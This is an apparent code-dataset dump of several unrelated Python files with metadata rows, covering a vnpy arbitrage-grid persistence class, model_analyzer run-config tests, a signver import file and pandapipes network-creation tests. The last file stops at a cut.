for long_json in j.get('long_list',[]):
g = ArbitrageGrid(direction=ARBITRAGE_LONG,openprice=long_json.get('openPrice',EMPTY_FLOAT),closeprice=long_json.get('closePrice',EMPTY_FLOAT))
g.fromJson(long_json)
self.long_list.append(g)
self.short_list = []
for short_json in j.get('short_list', []):
g = ArbitrageGrid(direction=ARBITRAGE_SHORT, openprice=short_json.get('openPrice', EMPTY_FLOAT),
closeprice=short_json.get('closePrice', EMPTY_FLOAT))
g.fromJson(short_json)
self.short_list.append(g)
self.writeCtaLog(u'数据恢复完毕')
def get_data_folder(self):
"""获取数据目录"""
# 工作目录
currentFolder = os.path.abspath(os.path.join(os.getcwd(), u'data'))
if os.path.isdir(currentFolder):
# 如果工作目录下,存在data子目录,就使用data子目录
return currentFolder
else:
# 否则,使用缺省保存目录 vnpy/trader/app/ctaStrategy/data
currentFolder = os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
if os.path.exists(currentFolder):
if os.path.isdir(currentFolder):
return currentFolder
else:
return os.path.dirname(__file__)
else:
os.mkdir(currentFolder)
return currentFolder
def save(self,db=EMPTY_STRING):
"""
持久化到json文件
:return:
"""
if not self.strategy:
self.writeCtaError(u'策略对象为空,不能保存')
return
# 回测模式不保存
if self.strategy and getattr(self.strategy, 'backtesting', False):
return
json_file = os.path.abspath(
os.path.join(self.get_data_folder(), u'{}_AGrids.json'.format(self.strategy.name)))
try:
json_data = self.toJson()
with open(json_file, 'w') as f:
data = json.dumps(json_data, indent=4)
f.write(data)
except IOError as ex:
self.writeCtaError(u'写入AGrids文件{}出错,ex:{}'.format(json_file, str(ex)))
def load(self,db=EMPTY_STRING):
"""
数据从Json文件加载
:return:
"""
if not self.strategy:
self.writeCtaError(u'策略对象为空,不能加载')
return
json_file = os.path.abspath(os.path.join(self.get_data_folder(), u'{}_AGrids.json'.format(self.strategy.name)))
json_data = {}
if os.path.exists(json_file):
try:
with open(json_file, 'r', encoding='utf8') as f:
# 解析json文件
json_data = json.load(f)
except IOError as ex:
self.writeCtaError(u'读取AGrids文件{}出错,ex:{}'.format(json_file, str(ex)))
json_data = {}
# 从持久化文件恢复数据
self.fromJson(json_data)
def addGrid(self,grid):
"""
添加正套/反套网格
:param grid:
:return:
"""
if not isinstance(grid,ArbitrageGrid):
self.writeCtaError(u'添加网格不是套利网格ArbitrageGrid类型')
return
if grid.direction == ARBITRAGE_LONG:
if grid.id in [g.id for g in self.long_list]:
self.writeCtaError('添加{}网格 id{}已存在,不能添加'.format(ARBITRAGE_LONG, grid.id))
return
self.long_list.append(grid)
return
if grid.direction == ARBITRAGE_SHORT:
if grid.id in [g.id for g in self.short_list]:
self.writeCtaError(u'添加{}网格 id{}已存在,不能添加'.format(ARBITRAGE_SHORT, grid.id))
return
self.short_list.append(grid)
| 40.344523 | 169 | 0.53594 | 12,177 | 114,175 | 4.89513 | 0.054283 | 0.033217 | 0.034895 | 0.011743 | 0.893253 | 0.870571 | 0.859633 | 0.845457 | 0.830241 | 0.814303 | 0 | 0.007283 | 0.357845 | 114,175 | 2,829 | 170 | 40.358784 | 0.805723 | 0.05961 | 0 | 0.869805 | 0 | 0.001002 | 0.055532 | 0.016047 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044066 | false | 0.006009 | 0.004507 | 0.000501 | 0.119179 | 0.003005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b969dcea70b5cbeafd9250bb5ad0855b93ed0840 | 17 | py | Python | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | 1 | 2021-06-22T17:03:11.000Z | 2021-06-22T17:03:11.000Z | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | null | null | null | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | null | null | null | print(str(12.66)) | 17 | 17 | 0.705882 | 4 | 17 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 17 | 1 | 17 | 17 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
b972833d7683323ac1d2e6fffee663b9475628da | 24,112 | py | Python | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .common import test_result_collector as trc
from .mocks.mock_config import MockConfig
from .mocks.mock_model_config import MockModelConfig
from .mocks.mock_client import MockTritonClientMethods
from model_analyzer.config.input.config import AnalyzerConfig
from model_analyzer.cli.cli import CLI
from model_analyzer.triton.client.grpc_client import TritonGRPCClient
from model_analyzer.config.run.run_search import RunSearch
from model_analyzer.config.run.run_config_generator \
import RunConfigGenerator
from unittest.mock import mock_open, patch
import yaml
class TestRunConfigGenerator(trc.TestResultCollector):
def _evaluate_config(self, args, yaml_content):
mock_config = MockConfig(args, yaml_content)
mock_config.start()
config = AnalyzerConfig()
cli = CLI(config)
cli.parse()
mock_config.stop()
return config
def test_parameter_sweep(self):
args = [
'model-analyzer', '--model-repository', 'cli_repository', '-f',
'path-to-config-file', '--model-names', 'vgg11',
'--run-config-search-disable'
]
yaml_content = ''
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client = MockTritonClientMethods()
mock_client.start()
client = TritonGRPCClient('localhost:8000')
run_search = RunSearch(16, 1, 16)
# When there is not any sweep_parameter the length of
# run_configs should be equal to the length of different
# sweep configurations per model
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
yaml_content = yaml.dump({
'concurrency': [2, 3, 4],
'batch_sizes': [4, 5, 6]
})
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 9)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
kind: KIND_GPU
count: 1
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
args = [
'model-analyzer', '--model-repository', 'cli_repository', '-f',
'path-to-config-file', '--run-config-search-disable'
]
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: KIND_GPU
count: 1
-
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_client.start()
mock_model_config.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 2)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: KIND_GPU
count: 1
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 6)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertTrue(len(expected_instance_groups), instance_groups)
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertTrue(len(expected_instance_groups), instance_groups)
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
preferred_batch_size: [ 4, 8 ]
max_queue_delay_microseconds: 100
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 54)
instance_groups = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
instance_groups.append(instance_group)
expected_instance_groups = 9 * [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
self.assertEqual(len(expected_instance_groups),
len(instance_groups))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
concurrency: [1, 2, 3]
batch_sizes: [2, 3, 4]
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
preferred_batch_size: [[ 4, 8 ], [ 5, 6 ]]
max_queue_delay_microseconds: [100, 200]
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 216)
instance_groups = []
dynamic_batchings = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
dynamic_batching = run_config.model_config().get_config(
)['dynamic_batching']
dynamic_batchings.append(dynamic_batching)
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
expected_dynamic_batchings = [{
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'200'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'200'
}]
self.assertEqual(
len(instance_groups), 9 * len(expected_instance_groups) *
len(expected_dynamic_batchings))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
for dynamic_batching in dynamic_batchings:
self.assertIn(dynamic_batching, expected_dynamic_batchings)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
dynamic_batching:
-
preferred_batch_size: [ 4, 8 ]
max_queue_delay_microseconds: 100
-
preferred_batch_size: [ 5, 6 ]
max_queue_delay_microseconds: 200
instance_group:
-
kind: [KIND_GPU, KIND_CPU]
count: [1, 2, 3]
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 12)
instance_groups = []
dynamic_batchings = []
for run_config in run_configs:
instance_group = run_config.model_config().get_config(
)['instance_group']
dynamic_batching = run_config.model_config().get_config(
)['dynamic_batching']
dynamic_batchings.append(dynamic_batching)
instance_groups.append(instance_group)
expected_instance_groups = [[{
'count': 1,
'kind': 'KIND_GPU'
}], [{
'count': 2,
'kind': 'KIND_GPU'
}], [{
'count': 3,
'kind': 'KIND_GPU'
}], [{
'count': 1,
'kind': 'KIND_CPU'
}], [{
'count': 2,
'kind': 'KIND_CPU'
}], [{
'count': 3,
'kind': 'KIND_CPU'
}]]
expected_dynamic_batchings = [{
'preferred_batch_size': [4, 8],
'max_queue_delay_microseconds':
'100'
}, {
'preferred_batch_size': [5, 6],
'max_queue_delay_microseconds':
'200'
}]
self.assertEqual(
len(instance_groups),
len(expected_instance_groups) *
len(expected_dynamic_batchings))
for instance_group in instance_groups:
self.assertIn(instance_group, expected_instance_groups)
for dynamic_batching in dynamic_batchings:
self.assertIn(dynamic_batching, expected_dynamic_batchings)
mock_model_config.stop()
mock_client.stop()
| 39.788779 | 79 | 0.428459 | 1,879 | 24,112 | 5.172964 | 0.093667 | 0.081481 | 0.052469 | 0.02963 | 0.859362 | 0.851029 | 0.839403 | 0.836317 | 0.836317 | 0.831481 | 0 | 0.016061 | 0.496475 | 24,112 | 605 | 80 | 39.854545 | 0.784532 | 0.029861 | 0 | 0.858696 | 0 | 0 | 0.188278 | 0.048471 | 0 | 0 | 0 | 0 | 0.041667 | 1 | 0.003623 | false | 0 | 0.019928 | 0 | 0.027174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b97db24d7a582f7db94277f1178dad6585f3417f | 83 | py | Python | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | 4 | 2021-09-06T13:02:05.000Z | 2022-03-20T15:22:45.000Z | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | null | null | null | signver/utils/__init__.py | victordibia/signver | e547177b5dab542c6d242566675ddb9468dadc08 | [
"MIT"
] | 1 | 2022-03-04T16:20:52.000Z | 2022-03-04T16:20:52.000Z | from signver.utils import data_utils
from signver.utils import visualization_utils
| 27.666667 | 45 | 0.879518 | 12 | 83 | 5.916667 | 0.5 | 0.309859 | 0.450704 | 0.619718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 83 | 2 | 46 | 41.5 | 0.946667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b9af2912032a2869ba1222c94a4c0773ad5fe032 | 36,326 | py | Python | pandapipes/test/api/test_create.py | dlohmeier/pandapipes | 899bb44fdf5a4ff6aa3cac0a7bf88bc30611c73f | [
"BSD-3-Clause"
] | 48 | 2020-02-14T13:16:31.000Z | 2022-03-30T07:15:55.000Z | pandapipes/test/api/test_create.py | dlohmeier/pandapipes | 899bb44fdf5a4ff6aa3cac0a7bf88bc30611c73f | [
"BSD-3-Clause"
] | 279 | 2020-02-20T13:06:56.000Z | 2022-03-14T12:29:59.000Z | pandapipes/test/api/test_create.py | jkisse/pandapipes | a1ca2ca3e3913bc8a379f43085935f0ee1d10fd8 | [
"BSD-3-Clause"
] | 30 | 2020-02-14T15:38:24.000Z | 2022-02-21T13:37:12.000Z | # Copyright (c) 2020-2021 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel, and University of Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import copy
import pytest
import pandapipes
import numpy as np
@pytest.fixture
def create_empty_net():
return pandapipes.create_empty_network()
def test_create_network():
net = pandapipes.create_empty_network(fluid=3)
with pytest.raises(AttributeError):
pandapipes.get_fluid(net)
def test_create_junction(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8)
assert len(net.junction) == 1
assert np.all(net.junction.index == [8])
assert net.junction.at[8, "pn_bar"] == 1
assert net.junction.at[8, "tfluid_k"] == 293
with pytest.raises(UserWarning):
pandapipes.create_junction(net, 1, 293, index=8)
with pytest.raises(UserWarning):
pandapipes.create_junction(net, 1, 293, geodata=(1, 2, 3))
def test_create_sink(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8)
pandapipes.create_junction(net, 1, 293, index=9)
pandapipes.create_sink(net, 9, mdot_kg_per_s=0.1, index=2)
assert len(net.junction) == 2
assert len(net.sink) == 1
assert np.all(net.sink.index == [2])
assert net.sink.at[2, "junction"] == 9
assert net.sink.at[2, "mdot_kg_per_s"] == 0.1
with pytest.raises(UserWarning):
pandapipes.create_sink(net, junction=10, mdot_kg_per_s=0.1)
with pytest.raises(UserWarning):
pandapipes.create_sink(net, junction=9, mdot_kg_per_s=0.1, index=2)
def test_create_source(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8)
pandapipes.create_junction(net, 1, 293, index=9)
pandapipes.create_source(net, 9, mdot_kg_per_s=0.1, index=2)
assert len(net.junction) == 2
assert len(net.source) == 1
assert np.all(net.source.index == [2])
assert net.source.at[2, "junction"] == 9
assert net.source.at[2, "mdot_kg_per_s"] == 0.1
with pytest.raises(UserWarning):
pandapipes.create_source(net, junction=10, mdot_kg_per_s=0.1)
with pytest.raises(UserWarning):
pandapipes.create_source(net, junction=9, mdot_kg_per_s=0.1, index=2)
def test_create_ext_grid(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8)
pandapipes.create_junction(net, 1, 293, index=9)
pandapipes.create_ext_grid(net, 9, p_bar=1, t_k=295, index=2)
assert len(net.junction) == 2
assert len(net.ext_grid) == 1
assert np.all(net.ext_grid.index == [2])
assert net.ext_grid.at[2, "junction"] == 9
assert net.ext_grid.at[2, "p_bar"] == 1
assert net.ext_grid.at[2, "t_k"] == 295
with pytest.raises(UserWarning):
pandapipes.create_ext_grid(net, junction=10, p_bar=1, t_k=295)
with pytest.raises(UserWarning):
pandapipes.create_ext_grid(net, junction=9, p_bar=1, t_k=295, index=2)
def test_create_heat_exchanger(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_heat_exchanger(net, 8, 9, 0.3, qext_w=200, index=2)
assert len(net.junction) == 2
assert len(net.heat_exchanger) == 1
assert np.all(net.heat_exchanger.index == [2])
assert net.heat_exchanger.at[2, "from_junction"] == 8
assert net.heat_exchanger.at[2, "to_junction"] == 9
assert net.heat_exchanger.at[2, "diameter_m"] == 0.3
assert net.heat_exchanger.at[2, "qext_w"] == 200
assert net.heat_exchanger.at[2, "loss_coefficient"] == 0
with pytest.raises(UserWarning):
pandapipes.create_heat_exchanger(net, 8, 10, 0.3, qext_w=200)
with pytest.raises(UserWarning):
pandapipes.create_heat_exchanger(net, 8, 9, 0.3, qext_w=200, index=2)
def test_create_pipe(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_pipe(net, 8, 9, "80_GGG", 0.3, index=2, geodata=[(0, 1), (1, 1), (2, 2)])
assert len(net.junction) == 2
assert len(net.pipe) == 1
assert np.all(net.pipe.index == [2])
assert net.pipe.at[2, "from_junction"] == 8
assert net.pipe.at[2, "to_junction"] == 9
assert net.pipe.at[2, "length_km"] == 0.3
assert net.pipe.at[2, "diameter_m"] == 0.086
assert net.pipe.at[2, "loss_coefficient"] == 0
assert net.pipe.at[2, "std_type"] == "80_GGG"
with pytest.raises(UserWarning):
pandapipes.create_pipe(net, 8, 9, "80_GGG", 0.3, index=2)
with pytest.raises(UserWarning):
pandapipes.create_pipe(net, 8, 10, "80_GGG", 0.3)
with pytest.raises(UserWarning):
pandapipes.create_pipe(net, 8, 9, "blah", 0.3)
net2 = pandapipes.create_empty_network(fluid="hgas", add_stdtypes=False)
pandapipes.create_junction(net2, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net2, 1, 293, index=9, geodata=(2, 2))
with pytest.raises(UserWarning):
pandapipes.create_pipe(net2, 8, 9, "80_GGG", 0.3)
def test_create_pipe_from_parameters(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, index=2,
geodata=[(0, 1), (1, 1), (2, 2)])
assert len(net.junction) == 2
assert len(net.pipe) == 1
assert np.all(net.pipe.index == [2])
assert net.pipe.at[2, "from_junction"] == 8
assert net.pipe.at[2, "to_junction"] == 9
assert net.pipe.at[2, "length_km"] == 0.3
assert net.pipe.at[2, "diameter_m"] == 0.4
assert net.pipe.at[2, "loss_coefficient"] == 0
assert net.pipe.at[2, "std_type"] is None
with pytest.raises(UserWarning):
pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, index=2)
with pytest.raises(UserWarning):
pandapipes.create_pipe_from_parameters(net, 8, 10, 0.3, 0.4)
with pytest.raises(UserWarning):
pandapipes.create_pipe_from_parameters(net, 8, 9, 0.3, 0.4, std_type="blah")
def test_create_valve(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_valve(net, 8, 9, 0.4, True, index=2)
assert len(net.junction) == 2
assert len(net.valve) == 1
assert np.all(net.valve.index == [2])
assert net.valve.at[2, "from_junction"] == 8
assert net.valve.at[2, "to_junction"] == 9
assert net.valve.at[2, "diameter_m"] == 0.4
assert net.valve.at[2, "loss_coefficient"] == 0
with pytest.raises(UserWarning):
pandapipes.create_valve(net, 8, 9, 0.4, True, index=2)
with pytest.raises(UserWarning):
pandapipes.create_valve(net, 8, 10, 0.4, True)
with pytest.raises(ValueError):
pandapipes.create_valve(net, 8, 9, 0.4, True, geodata=[(0, 1), (1, 1), (2, 2)])
def test_create_pump(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_pump(net, 8, 9, "P1", index=2)
assert len(net.junction) == 2
assert len(net.pump) == 1
assert np.all(net.pump.index == [2])
assert net.pump.at[2, "from_junction"] == 8
assert net.pump.at[2, "to_junction"] == 9
assert net.pump.at[2, "std_type"] == "P1"
with pytest.raises(UserWarning):
pandapipes.create_pump(net, 8, 9, "P1", index=2)
with pytest.raises(UserWarning):
pandapipes.create_pump(net, 8, 10, "P1")
with pytest.raises(UserWarning):
pandapipes.create_pump(net, 8, 9, "blah")
with pytest.raises(ValueError):
pandapipes.create_pump(net, 8, 9, "P1", geodata=[(0, 1), (1, 1), (2, 2)])
net2 = pandapipes.create_empty_network(fluid="hgas", add_stdtypes=False)
pandapipes.create_junction(net2, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net2, 1, 293, index=9, geodata=(2, 2))
with pytest.raises(UserWarning):
pandapipes.create_pump(net2, 8, 9, "P1")
def test_create_pump_from_parameters(create_empty_net):
net = copy.deepcopy(create_empty_net)
pandapipes.create_junction(net, 1, 293, index=8, geodata=(0, 1))
pandapipes.create_junction(net, 1, 293, index=9, geodata=(2, 2))
pandapipes.create_pump_from_parameters(net, 8, 9, "pump1", pressure_list=[0, 1, 2, 3],
flowrate_list=[0, 1, 2, 3], reg_polynomial_degree=1,
index=2)
assert len(net.junction) == 2
assert len(net.pump) == 1
assert np.all(net.pump.index == [2])
assert net.pump.at[2, "from_junction"] == 8
assert net.pump.at[2, "to_junction"] == 9
assert net.pump.at[2, "std_type"] == "pump1"
assert "pump1" in net.std_type["pump"]
with pytest.raises(UserWarning):
pandapipes.create_pump_from_parameters(net, 8, 9, "pump1", pressure_list=[0, 1, 2, 3],
flowrate_list=[0, 1, 2, 3], reg_polynomial_degree=1,
index=2)
with pytest.raises(UserWarning):
pandapipes.create_pump_from_parameters(net, 8, 10, "pump1", pressure_list=[0, 1, 2, 3],
flowrate_list=[0, 1, 2, 3], reg_polynomial_degree=1,
index=2)
with pytest.raises(ValueError):
